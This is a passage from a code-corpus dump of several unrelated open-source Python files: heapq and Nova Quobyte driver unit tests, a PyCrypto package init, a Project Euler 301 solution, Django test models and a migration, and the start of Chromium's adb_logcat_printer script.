if trial & 1: # Half of the time, use heapify
heap = data[:]
self.module.heapify(heap)
else: # The rest of the time, use heappush
heap = []
for item in data:
self.module.heappush(heap, item)
heap_sorted = [self.module.heappop(heap) for i in range(size)]
self.assertEqual(heap_sorted, sorted(data))
def test_merge(self):
inputs = []
for i in xrange(random.randrange(5)):
row = sorted(random.randrange(1000) for j in range(random.randrange(10)))
inputs.append(row)
self.assertEqual(sorted(chain(*inputs)), list(self.module.merge(*inputs)))
self.assertEqual(list(self.module.merge()), [])
def test_merge_stability(self):
class Int(int):
pass
inputs = [[], [], [], []]
for i in range(20000):
stream = random.randrange(4)
x = random.randrange(500)
obj = Int(x)
obj.pair = (x, stream)
inputs[stream].append(obj)
for stream in inputs:
stream.sort()
result = [i.pair for i in self.module.merge(*inputs)]
self.assertEqual(result, sorted(result))
def test_nsmallest(self):
data = [(random.randrange(2000), i) for i in range(1000)]
for f in (None, lambda x: x[0] * 547 % 2000):
for n in (0, 1, 2, 10, 100, 400, 999, 1000, 1100):
self.assertEqual(self.module.nsmallest(n, data), sorted(data)[:n])
self.assertEqual(self.module.nsmallest(n, data, key=f),
sorted(data, key=f)[:n])
def test_nlargest(self):
data = [(random.randrange(2000), i) for i in range(1000)]
for f in (None, lambda x: x[0] * 547 % 2000):
for n in (0, 1, 2, 10, 100, 400, 999, 1000, 1100):
self.assertEqual(self.module.nlargest(n, data),
sorted(data, reverse=True)[:n])
self.assertEqual(self.module.nlargest(n, data, key=f),
sorted(data, key=f, reverse=True)[:n])
def test_comparison_operator(self):
# Issue 3051: Make sure heapq works with both __lt__ and __le__
def hsort(data, comp):
data = map(comp, data)
self.module.heapify(data)
return [self.module.heappop(data).x for i in range(len(data))]
class LT:
def __init__(self, x):
self.x = x
def __lt__(self, other):
return self.x > other.x
class LE:
def __init__(self, x):
self.x = x
def __le__(self, other):
return self.x >= other.x
data = [random.random() for i in range(100)]
target = sorted(data, reverse=True)
self.assertEqual(hsort(data, LT), target)
self.assertEqual(hsort(data, LE), target)
class TestHeapPython(TestHeap):
module = py_heapq
@skipUnless(c_heapq, 'requires _heapq')
class TestHeapC(TestHeap):
module = c_heapq
#==============================================================================
class LenOnly:
"Dummy sequence class defining __len__ but not __getitem__."
def __len__(self):
return 10
class GetOnly:
"Dummy sequence class defining __getitem__ but not __len__."
def __getitem__(self, ndx):
return 10
class CmpErr:
"Dummy element that always raises an error during comparison"
def __cmp__(self, other):
raise ZeroDivisionError
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing next()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def next(self):
raise StopIteration
from itertools import chain, imap
def L(seqn):
'Test multiple tiers of iterators'
return chain(imap(lambda x:x, R(Ig(G(seqn)))))
class SideEffectLT:
def __init__(self, value, heap):
self.value = value
self.heap = heap
def __lt__(self, other):
self.heap[:] = []
return self.value < other.value
class TestErrorHandling(TestCase):
module = None
def test_non_sequence(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises((TypeError, AttributeError), f, 10)
for f in (self.module.heappush, self.module.heapreplace,
self.module.nlargest, self.module.nsmallest):
self.assertRaises((TypeError, AttributeError), f, 10, 10)
def test_len_only(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises((TypeError, AttributeError), f, LenOnly())
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises((TypeError, AttributeError), f, LenOnly(), 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 2, LenOnly())
def test_get_only(self):
seq = [CmpErr(), CmpErr(), CmpErr()]
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(ZeroDivisionError, f, seq)
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises(ZeroDivisionError, f, seq, 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(ZeroDivisionError, f, 2, seq)
def test_arg_parsing(self):
for f in (self.module.heapify, self.module.heappop,
self.module.heappush, self.module.heapreplace,
self.module.nlargest, self.module.nsmallest):
self.assertRaises((TypeError, AttributeError), f, 10)
def test_iterable_args(self):
for f in (self.module.nlargest, self.module.nsmallest):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, L, R):
with test_support.check_py3k_warnings(
("comparing unequal types not supported",
DeprecationWarning), quiet=True):
self.assertEqual(f(2, g(s)), f(2,s))
self.assertEqual(f(2, S(s)), [])
self.assertRaises(TypeError, f, 2, X(s))
self.assertRaises(TypeError, f, 2, N(s))
self.assertRaises(ZeroDivisionError, f, 2, E(s))
# Issue #17278: the heap may change size while it's being walked.
def test_heappush_mutating_heap(self):
heap = []
heap.extend(SideEffectLT(i, heap) for i in range(200))
# Python version raises IndexError, C version RuntimeError
with self.assertRaises((IndexError, RuntimeError)):
self.module.heappush(heap, SideEffectLT(5, heap))
def test_heappop_mutating_heap(self):
heap = []
heap.extend(SideEffectLT(i, heap) for i in range(200))
# Python version raises IndexError, C version RuntimeError
with self.assertRaises((IndexError, RuntimeError)):
self.module.heappop(heap)
class TestErrorHandlingPython(TestErrorHandling):
module = py_heapq
@skipUnless(c_heapq, 'requires _heapq')
class TestErrorHandlingC(TestErrorHandling):
module = c_heapq
#==============================================================================
def test_main(verbose=None):
test_classes = [TestModules, TestHeapPython, TestHeapC,
TestErrorHandlingPython, TestErrorHandlingC]
test_support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in xrange(len(counts)):
test_support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print counts
if __name__ == "__main__":
test_main(verbose=True)
|
jianghuaw/nova
|
refs/heads/master
|
nova/tests/unit/virt/libvirt/volume/test_quobyte.py
|
2
|
# Copyright (c) 2015 Quobyte Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the Quobyte volume driver module."""
import os
import traceback
import mock
from oslo_concurrency import processutils
from oslo_utils import fileutils
import psutil
import six
from nova import exception as nova_exception
from nova import test
from nova.tests.unit.virt.libvirt.volume import test_volume
from nova import utils
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt.libvirt.volume import quobyte
class QuobyteTestCase(test.NoDBTestCase):
"""Tests the nova.virt.libvirt.volume.quobyte module utilities."""
TEST_MNT_POINT = mock.sentinel.TEST_MNT_POINT
def assertRaisesAndMessageMatches(
self, excClass, msg, callableObj, *args, **kwargs):
"""Ensure that the specified exception was raised. """
caught = False
try:
callableObj(*args, **kwargs)
except Exception as exc:
caught = True
self.assertIsInstance(exc, excClass,
'Wrong exception caught: %s Stacktrace: %s' %
(exc, traceback.format_exc()))
self.assertIn(msg, six.text_type(exc))
if not caught:
self.fail('Expected raised exception but nothing caught.')
def get_mock_partitions(self):
mypart = mock.Mock()
mypart.device = "quobyte@"
mypart.mountpoint = self.TEST_MNT_POINT
return [mypart]
@mock.patch.object(os.path, "exists", return_value=False)
@mock.patch.object(fileutils, "ensure_tree")
@mock.patch.object(utils, "execute")
def test_quobyte_mount_volume_not_systemd(self, mock_execute,
mock_ensure_tree,
mock_exists):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
quobyte.mount_volume(quobyte_volume, export_mnt_base)
mock_ensure_tree.assert_called_once_with(export_mnt_base)
expected_commands = [mock.call('mount.quobyte',
'--disable-xattrs',
quobyte_volume,
export_mnt_base)
]
mock_execute.assert_has_calls(expected_commands)
mock_exists.assert_called_once_with(" /run/systemd/system")
@mock.patch.object(os.path, "exists", return_value=True)
@mock.patch.object(fileutils, "ensure_tree")
@mock.patch.object(utils, "execute")
def test_quobyte_mount_volume_systemd(self, mock_execute,
mock_ensure_tree,
mock_exists):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
quobyte.mount_volume(quobyte_volume, export_mnt_base)
mock_ensure_tree.assert_called_once_with(export_mnt_base)
expected_commands = [mock.call('systemd-run',
'--scope',
'--user',
'mount.quobyte',
'--disable-xattrs',
quobyte_volume,
export_mnt_base)
]
mock_execute.assert_has_calls(expected_commands)
mock_exists.assert_called_once_with(" /run/systemd/system")
@mock.patch.object(os.path, "exists", return_value=False)
@mock.patch.object(fileutils, "ensure_tree")
@mock.patch.object(utils, "execute")
def test_quobyte_mount_volume_with_config(self,
mock_execute,
mock_ensure_tree,
mock_exists):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
config_file_dummy = "/etc/quobyte/dummy.conf"
quobyte.mount_volume(quobyte_volume,
export_mnt_base,
config_file_dummy)
mock_ensure_tree.assert_called_once_with(export_mnt_base)
expected_commands = [mock.call('mount.quobyte',
'--disable-xattrs',
quobyte_volume,
export_mnt_base,
'-c',
config_file_dummy)
]
mock_execute.assert_has_calls(expected_commands)
mock_exists.assert_called_once_with(" /run/systemd/system")
@mock.patch.object(fileutils, "ensure_tree")
@mock.patch.object(utils, "execute",
side_effect=(processutils.
ProcessExecutionError))
def test_quobyte_mount_volume_fails(self, mock_execute, mock_ensure_tree):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
self.assertRaises(processutils.ProcessExecutionError,
quobyte.mount_volume,
quobyte_volume,
export_mnt_base)
@mock.patch.object(utils, "execute")
def test_quobyte_umount_volume(self, mock_execute):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
quobyte.umount_volume(export_mnt_base)
mock_execute.assert_called_once_with('umount.quobyte',
export_mnt_base)
@mock.patch.object(quobyte.LOG, "error")
@mock.patch.object(utils, "execute")
def test_quobyte_umount_volume_warns(self,
mock_execute,
mock_debug):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
def exec_side_effect(*cmd, **kwargs):
exerror = processutils.ProcessExecutionError(
"Device or resource busy")
raise exerror
mock_execute.side_effect = exec_side_effect
quobyte.umount_volume(export_mnt_base)
(mock_debug.
assert_called_once_with("The Quobyte volume at %s is still in use.",
export_mnt_base))
@mock.patch.object(quobyte.LOG, "exception")
@mock.patch.object(utils, "execute",
side_effect=(processutils.ProcessExecutionError))
def test_quobyte_umount_volume_fails(self,
mock_execute,
mock_exception):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
quobyte.umount_volume(export_mnt_base)
(mock_exception.
assert_called_once_with("Couldn't unmount "
"the Quobyte Volume at %s",
export_mnt_base))
@mock.patch.object(psutil, "disk_partitions")
@mock.patch.object(os, "stat")
def test_validate_volume_all_good(self, stat_mock, part_mock):
part_mock.return_value = self.get_mock_partitions()
drv = quobyte
def statMockCall(*args):
if args[0] == self.TEST_MNT_POINT:
stat_result = mock.Mock()
stat_result.st_size = 0
return stat_result
return os.stat(args)
stat_mock.side_effect = statMockCall
drv.validate_volume(self.TEST_MNT_POINT)
stat_mock.assert_called_once_with(self.TEST_MNT_POINT)
part_mock.assert_called_once_with(all=True)
@mock.patch.object(psutil, "disk_partitions")
@mock.patch.object(os, "stat")
def test_validate_volume_mount_not_working(self, stat_mock, part_mock):
part_mock.return_value = self.get_mock_partitions()
drv = quobyte
def statMockCall(*args):
print (args)
if args[0] == self.TEST_MNT_POINT:
raise nova_exception.InvalidVolume()
stat_mock.side_effect = [os.stat, statMockCall]
self.assertRaises(
excClass=nova_exception.InvalidVolume,
callableObj=drv.validate_volume,
mount_path=self.TEST_MNT_POINT)
stat_mock.assert_called_with(self.TEST_MNT_POINT)
part_mock.assert_called_once_with(all=True)
def test_validate_volume_no_mtab_entry(self):
msg = ("No matching Quobyte mount entry for %(mpt)s"
" could be found for validation in partition list."
% {'mpt': self.TEST_MNT_POINT})
self.assertRaisesAndMessageMatches(
nova_exception.InvalidVolume,
msg,
quobyte.validate_volume,
self.TEST_MNT_POINT)
@mock.patch.object(psutil, "disk_partitions")
def test_validate_volume_wrong_mount_type(self, part_mock):
mypart = mock.Mock()
mypart.device = "not-quobyte"
mypart.mountpoint = self.TEST_MNT_POINT
part_mock.return_value = [mypart]
msg = ("The mount %(mpt)s is not a valid"
" Quobyte volume according to partition list."
% {'mpt': self.TEST_MNT_POINT})
self.assertRaisesAndMessageMatches(
nova_exception.InvalidVolume,
msg,
quobyte.validate_volume,
self.TEST_MNT_POINT)
part_mock.assert_called_once_with(all=True)
@mock.patch.object(os, "stat")
@mock.patch.object(psutil, "disk_partitions")
def test_validate_volume_stale_mount(self, part_mock, stat_mock):
part_mock.return_value = self.get_mock_partitions()
def statMockCall(*args):
if args[0] == self.TEST_MNT_POINT:
stat_result = mock.Mock()
stat_result.st_size = 1
return stat_result
return os.stat(args)
stat_mock.side_effect = statMockCall
# As this uses a dir size >0, it raises an exception
self.assertRaises(
nova_exception.InvalidVolume,
quobyte.validate_volume,
self.TEST_MNT_POINT)
part_mock.assert_called_once_with(all=True)
class LibvirtQuobyteVolumeDriverTestCase(
test_volume.LibvirtVolumeBaseTestCase):
"""Tests the LibvirtQuobyteVolumeDriver class."""
@mock.patch.object(quobyte, 'validate_volume')
@mock.patch.object(quobyte, 'mount_volume')
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=False)
def test_libvirt_quobyte_driver_mount(self,
mock_is_mounted,
mock_mount_volume,
mock_validate_volume
):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
file_path = os.path.join(export_mnt_base, self.name)
connection_info = {'data': {'export': export_string,
'name': self.name}}
libvirt_driver.connect_volume(connection_info, self.disk_info,
mock.sentinel.instance)
conf = libvirt_driver.get_config(connection_info, self.disk_info)
tree = conf.format_dom()
self._assertFileTypeEquals(tree, file_path)
mock_mount_volume.assert_called_once_with(quobyte_volume,
export_mnt_base,
mock.ANY)
mock_validate_volume.assert_called_with(export_mnt_base)
@mock.patch.object(quobyte, 'validate_volume')
@mock.patch.object(quobyte, 'umount_volume')
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=True)
def test_libvirt_quobyte_driver_umount(self, mock_is_mounted,
mock_umount_volume,
mock_validate_volume):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
file_path = os.path.join(export_mnt_base, self.name)
connection_info = {'data': {'export': export_string,
'name': self.name}}
libvirt_driver.connect_volume(connection_info, self.disk_info,
mock.sentinel.instance)
conf = libvirt_driver.get_config(connection_info, self.disk_info)
tree = conf.format_dom()
self._assertFileTypeEquals(tree, file_path)
libvirt_driver.disconnect_volume(connection_info, "vde",
mock.sentinel.instance)
mock_validate_volume.assert_called_once_with(export_mnt_base)
mock_umount_volume.assert_called_once_with(export_mnt_base)
@mock.patch.object(quobyte, 'validate_volume')
@mock.patch.object(quobyte, 'umount_volume')
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=True)
def test_libvirt_quobyte_driver_already_mounted(self,
mock_is_mounted,
mock_umount_volume,
mock_validate_volume
):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
file_path = os.path.join(export_mnt_base, self.name)
connection_info = {'data': {'export': export_string,
'name': self.name}}
libvirt_driver.connect_volume(connection_info, self.disk_info,
mock.sentinel.instance)
conf = libvirt_driver.get_config(connection_info, self.disk_info)
tree = conf.format_dom()
self._assertFileTypeEquals(tree, file_path)
libvirt_driver.disconnect_volume(connection_info, "vde",
mock.sentinel.instance)
mock_umount_volume.assert_called_once_with(export_mnt_base)
mock_validate_volume.assert_called_once_with(export_mnt_base)
@mock.patch.object(quobyte, 'validate_volume')
@mock.patch.object(quobyte, 'mount_volume')
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=False)
def test_libvirt_quobyte_driver_qcow2(self, mock_is_mounted,
mock_mount_volume,
mock_validate_volume
):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
name = 'volume-00001'
image_format = 'qcow2'
quobyte_volume = '192.168.1.1/volume-00001'
connection_info = {'data': {'export': export_string,
'name': name,
'format': image_format}}
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
libvirt_driver.connect_volume(connection_info, self.disk_info,
mock.sentinel.instance)
conf = libvirt_driver.get_config(connection_info, self.disk_info)
tree = conf.format_dom()
self.assertEqual('file', tree.get('type'))
self.assertEqual('qcow2', tree.find('./driver').get('type'))
(mock_mount_volume.
assert_called_once_with('192.168.1.1/volume-00001',
export_mnt_base,
mock.ANY))
mock_validate_volume.assert_called_with(export_mnt_base)
libvirt_driver.disconnect_volume(connection_info, "vde",
mock.sentinel.instance)
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=True)
def test_libvirt_quobyte_driver_mount_non_quobyte_volume(self,
mock_is_mounted):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
connection_info = {'data': {'export': export_string,
'name': self.name}}
def exe_side_effect(*cmd, **kwargs):
if cmd == mock.ANY:
raise nova_exception.NovaException()
with mock.patch.object(quobyte,
'validate_volume') as mock_execute:
mock_execute.side_effect = exe_side_effect
self.assertRaises(nova_exception.NovaException,
libvirt_driver.connect_volume,
connection_info,
self.disk_info,
mock.sentinel.instance)
def test_libvirt_quobyte_driver_normalize_export_with_protocol(self):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
self.assertEqual("192.168.1.1/volume-00001",
libvirt_driver._normalize_export(export_string))
def test_libvirt_quobyte_driver_normalize_export_without_protocol(self):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = '192.168.1.1/volume-00001'
self.assertEqual("192.168.1.1/volume-00001",
libvirt_driver._normalize_export(export_string))
|
flyfei/python-for-android
|
refs/heads/master
|
python-build/python-libs/gdata/src/gdata/Crypto/PublicKey/__init__.py
|
273
|
"""Public-key encryption and signature algorithms.
Public-key encryption uses two different keys, one for encryption and
one for decryption. The encryption key can be made public, and the
decryption key is kept private. Many public-key algorithms can also
be used to sign messages, and some can *only* be used for signatures.
Crypto.PublicKey.DSA Digital Signature Algorithm. (Signature only)
Crypto.PublicKey.ElGamal (Signing and encryption)
Crypto.PublicKey.RSA (Signing, encryption, and blinding)
Crypto.PublicKey.qNEW (Signature only)
"""
__all__ = ['RSA', 'DSA', 'ElGamal', 'qNEW']
__revision__ = "$Id: __init__.py,v 1.4 2003/04/03 20:27:13 akuchling Exp $"
|
TheAlgorithms/Python
|
refs/heads/master
|
project_euler/problem_301/sol1.py
|
1
|
"""
Project Euler Problem 301: https://projecteuler.net/problem=301
Problem Statement:
Nim is a game played with heaps of stones, where two players take
it in turn to remove any number of stones from any heap until no stones remain.
We'll consider the three-heap normal-play version of
Nim, which works as follows:
- At the start of the game there are three heaps of stones.
- On each player's turn, the player may remove any positive
number of stones from any single heap.
- The first player unable to move (because no stones remain) loses.
If (n1, n2, n3) indicates a Nim position consisting of heaps of size
n1, n2, and n3, then there is a simple function, which you may look up
or attempt to deduce for yourself, X(n1, n2, n3) that returns:
- zero if, with perfect strategy, the player about to
move will eventually lose; or
- non-zero if, with perfect strategy, the player about
to move will eventually win.
For example X(1,2,3) = 0 because, no matter what the current player does,
the opponent can respond with a move that leaves two heaps of equal size,
at which point every move by the current player can be mirrored by the
opponent until no stones remain; so the current player loses. To illustrate:
- current player moves to (1,2,1)
- opponent moves to (1,0,1)
- current player moves to (0,0,1)
- opponent moves to (0,0,0), and so wins.
For how many positive integers n <= 2^30 does X(n,2n,3n) = 0?
"""
def solution(exponent: int = 30) -> int:
"""
For any given exponent x >= 0, 1 <= n <= 2^x.
This function returns how many Nim games are lost given that
each Nim game has three heaps of the form (n, 2*n, 3*n).
>>> solution(0)
1
>>> solution(2)
3
>>> solution(10)
144
"""
# To find how many total games were lost for a given exponent x,
# we need to find the Fibonacci number F(x+2).
fibonacci_index = exponent + 2
phi = (1 + 5 ** 0.5) / 2
fibonacci = (phi ** fibonacci_index - (phi - 1) ** fibonacci_index) / 5 ** 0.5
return int(fibonacci)
if __name__ == "__main__":
print(f"{solution() = }")
|
jgoclawski/django
|
refs/heads/master
|
tests/max_lengths/models.py
|
438
|
from django.db import models
class PersonWithDefaultMaxLengths(models.Model):
email = models.EmailField()
vcard = models.FileField(upload_to='/tmp')
homepage = models.URLField()
avatar = models.FilePathField()
class PersonWithCustomMaxLengths(models.Model):
email = models.EmailField(max_length=250)
vcard = models.FileField(upload_to='/tmp', max_length=250)
homepage = models.URLField(max_length=250)
avatar = models.FilePathField(max_length=250)
|
philgyford/django-spectator
|
refs/heads/main
|
spectator/events/migrations/0011_auto_20180125_1348.py
|
1
|
# Generated by Django 2.0 on 2018-01-25 13:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("spectator_events", "0010_auto_20180118_0906"),
]
operations = [
migrations.AlterModelOptions(
name="classicalwork",
options={"ordering": ("title_sort",), "verbose_name": "classical work"},
),
migrations.AlterModelOptions(
name="classicalworkrole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "classical work role",
},
),
migrations.AlterModelOptions(
name="dancepiece",
options={"ordering": ("title_sort",), "verbose_name": "dance piece"},
),
migrations.AlterModelOptions(
name="dancepiecerole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "dance piece role",
},
),
migrations.AlterModelOptions(
name="eventrole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "event role",
},
),
migrations.AlterModelOptions(
name="movierole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "movie role",
},
),
migrations.AlterModelOptions(
name="playrole",
options={
"ordering": ("role_order", "role_name"),
"verbose_name": "play role",
},
),
]
|
laperry1/android_external_chromium_org
|
refs/heads/cm-12.1
|
build/android/adb_logcat_printer.py
|
44
|
#!/usr/bin/env python
#
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Shutdown adb_logcat_monitor and print accumulated logs.
To test, call './adb_logcat_printer.py <base_dir>' where
<base_dir> contains 'adb logcat -v threadtime' files named as
logcat_<deviceID>_<sequenceNum>
The script will print the files to out, and will combine multiple
logcats from a single device if there is overlap.
Additionally, if a <base_dir>/LOGCAT_MONITOR_PID exists, the script
will attempt to terminate the contained PID by sending a SIGINT and
monitoring for the deletion of the aforementioned file.
"""
# pylint: disable=W0702
import cStringIO
import logging
import optparse
import os
import re
import signal
import sys
import time
# Set this to debug for more verbose output
LOG_LEVEL = logging.INFO
def CombineLogFiles(list_of_lists, logger):
"""Splices together multiple logcats from the same device.
Args:
list_of_lists: list of pairs (filename, list of timestamped lines)
logger: handler to log events
Returns:
list of lines with duplicates removed
"""
cur_device_log = ['']
for cur_file, cur_file_lines in list_of_lists:
# Ignore files with just the logcat header
if len(cur_file_lines) < 2:
continue
common_index = 0
# Skip this step if list just has empty string
if len(cur_device_log) > 1:
try:
line = cur_device_log[-1]
# Used to make sure we only splice on a timestamped line
if re.match(r'^\d{2}-\d{2} \d{2}:\d{2}:\d{2}.\d{3} ', line):
common_index = cur_file_lines.index(line)
else:
logger.warning('splice error - no timestamp in "%s"?', line.strip())
except ValueError:
# The last line was valid but wasn't found in the next file
cur_device_log += ['***** POSSIBLE INCOMPLETE LOGCAT *****']
logger.info('Unable to splice %s. Incomplete logcat?', cur_file)
cur_device_log += ['*'*30 + ' %s' % cur_file]
cur_device_log.extend(cur_file_lines[common_index:])
return cur_device_log
def FindLogFiles(base_dir):
"""Search a directory for logcat files.
Args:
base_dir: directory to search
Returns:
Mapping of device_id to a sorted list of file paths for a given device
"""
logcat_filter = re.compile(r'^logcat_(\w+)_(\d+)$')
# list of tuples (<device_id>, <seq num>, <full file path>)
filtered_list = []
for cur_file in os.listdir(base_dir):
matcher = logcat_filter.match(cur_file)
if matcher:
filtered_list += [(matcher.group(1), int(matcher.group(2)),
os.path.join(base_dir, cur_file))]
filtered_list.sort()
file_map = {}
for device_id, _, cur_file in filtered_list:
if device_id not in file_map:
file_map[device_id] = []
file_map[device_id] += [cur_file]
return file_map
def GetDeviceLogs(log_filenames, logger):
"""Read log files, combine and format.
Args:
log_filenames: mapping of device_id to sorted list of file paths
logger: logger handle for logging events
Returns:
list of formatted device logs, one for each device.
"""
device_logs = []
for device, device_files in log_filenames.iteritems():
logger.debug('%s: %s', device, str(device_files))
device_file_lines = []
for cur_file in device_files:
with open(cur_file) as f:
device_file_lines += [(cur_file, f.read().splitlines())]
combined_lines = CombineLogFiles(device_file_lines, logger)
# Prepend each line with a short unique ID so it's easy to see
# when the device changes. We don't use the start of the device
# ID because it can be the same among devices. Example lines:
# AB324: foo
# AB324: blah
device_logs += [('\n' + device[-5:] + ': ').join(combined_lines)]
return device_logs
def ShutdownLogcatMonitor(base_dir, logger):
"""Attempts to shutdown adb_logcat_monitor and blocks while waiting."""
try:
monitor_pid_path = os.path.join(base_dir, 'LOGCAT_MONITOR_PID')
with open(monitor_pid_path) as f:
monitor_pid = int(f.readline())
logger.info('Sending SIGTERM to %d', monitor_pid)
os.kill(monitor_pid, signal.SIGTERM)
i = 0
while True:
time.sleep(.2)
if not os.path.exists(monitor_pid_path):
return
if not os.path.exists('/proc/%d' % monitor_pid):
logger.warning('Monitor (pid %d) terminated uncleanly?', monitor_pid)
return
logger.info('Waiting for logcat process to terminate.')
i += 1
if i >= 10:
logger.warning('Monitor pid did not terminate. Continuing anyway.')
return
except (ValueError, IOError, OSError):
logger.exception('Error signaling logcat monitor - continuing')
def main(argv):
parser = optparse.OptionParser(usage='Usage: %prog [options] <log dir>')
parser.add_option('--output-path',
help='Output file path (if unspecified, prints to stdout)')
options, args = parser.parse_args(argv)
if len(args) != 1:
parser.error('Wrong number of unparsed args')
base_dir = args[0]
if options.output_path:
output_file = open(options.output_path, 'w')
else:
output_file = sys.stdout
log_stringio = cStringIO.StringIO()
logger = logging.getLogger('LogcatPrinter')
logger.setLevel(LOG_LEVEL)
sh = logging.StreamHandler(log_stringio)
sh.setFormatter(logging.Formatter('%(asctime)-2s %(levelname)-8s'
' %(message)s'))
logger.addHandler(sh)
try:
# Wait at least 5 seconds after base_dir is created before printing.
#
# The idea is that 'adb logcat > file' output consists of 2 phases:
# 1 Dump all the saved logs to the file
# 2 Stream log messages as they are generated
#
# We want to give enough time for phase 1 to complete. There's no
# good method to tell how long to wait, but it usually only takes a
# second. On most bots, this code path won't occur at all, since
# adb_logcat_monitor.py command will have spawned more than 5 seconds
# prior to called this shell script.
try:
sleep_time = 5 - (time.time() - os.path.getctime(base_dir))
except OSError:
sleep_time = 5
if sleep_time > 0:
logger.warning('Monitor just started? Sleeping %.1fs', sleep_time)
time.sleep(sleep_time)
assert os.path.exists(base_dir), '%s does not exist' % base_dir
ShutdownLogcatMonitor(base_dir, logger)
separator = '\n' + '*' * 80 + '\n\n'
for log in GetDeviceLogs(FindLogFiles(base_dir), logger):
